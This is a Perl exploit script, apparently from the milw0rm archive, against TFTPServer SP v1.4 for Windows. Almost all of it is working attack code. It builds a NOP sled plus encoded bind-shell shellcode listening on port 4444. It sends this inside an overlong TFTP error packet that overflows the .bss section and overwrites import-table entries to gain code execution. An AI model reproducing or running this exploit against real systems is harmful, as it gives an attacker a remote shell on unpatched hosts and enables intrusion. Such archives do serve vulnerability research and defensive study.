#!/usr/bin/perl

#	TFTPServer SP v1.4 for Windows remote .bss overflow exploit
#	The Service or the RunStandAlone version.
#	URL: http://sourceforge.net/projects/tftp-server/
#
#	Author:		tix or tixxDZ	<tixxdz@gmail.com>
#	Date:		07/05/2008
#
#	Tested on Windows XP SP2 French not patched
#
#	TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
#	Other versions may also be vulnerable.
#
#	TFTPServer respect the RFC 1350 for Error packets, lot of other
#		TFTP Servers don't respect it.
#	TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
#	BUFFER is at 0041B3AB in the .bss section.
#	This exploit will overwrite all the .bss section and some portion of the .idata section
#	to patch functions addresses in the IAT.
#	
#	For the TFTPServer Service we will patch the time() function
#	For the TFTPServer StandAlone program we will patch the printf() function
#
#	BUFFER = NOPS + SHELLCODE + RET
#	we will put and execute our shellcode in the .idata section, .idata => RWE.

use strict;
use IO::Socket::INET;

my $target = shift ||
	die "Usage: $0 <target> <type>\n <type> : type of the program\n".
	"\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";

my $type = defined $ARGV[0] ? shift : 's';

my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";

my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section

if ($type =~ /p/i) {
	#	"\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
	#	---------------------------------------------------------------------------
	#	0040EB50  -FF25 60034200    JMP DWORD PTR DS:[<&msvcrt.printf>]
	#	---------------------------------------------------------------------------
	
	print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
	
	$buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
	#	"\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
	#	------------------------------------------------------------------------
	#	0040EB60  -FF25 90034200    JMP DWORD PTR DS:[<&msvcrt.time>]
	#	------------------------------------------------------------------------
	
	print STDOUT "Exploiting TFTPServer Service program\n";

	$buffer = "\x90" x 19955 . $shellcode . $RET;
}

my $sock = IO::Socket::INET->new(	PeerAddr  => $target,
					PeerPort  =>  69,
					Proto     => 'udp')
	or die "error: $!\n";

$sock->send("\x00\x05" . $buffer, 0);
	
print STDOUT "done.\n";
exit 0;

# milw0rm.com [2008-05-08]
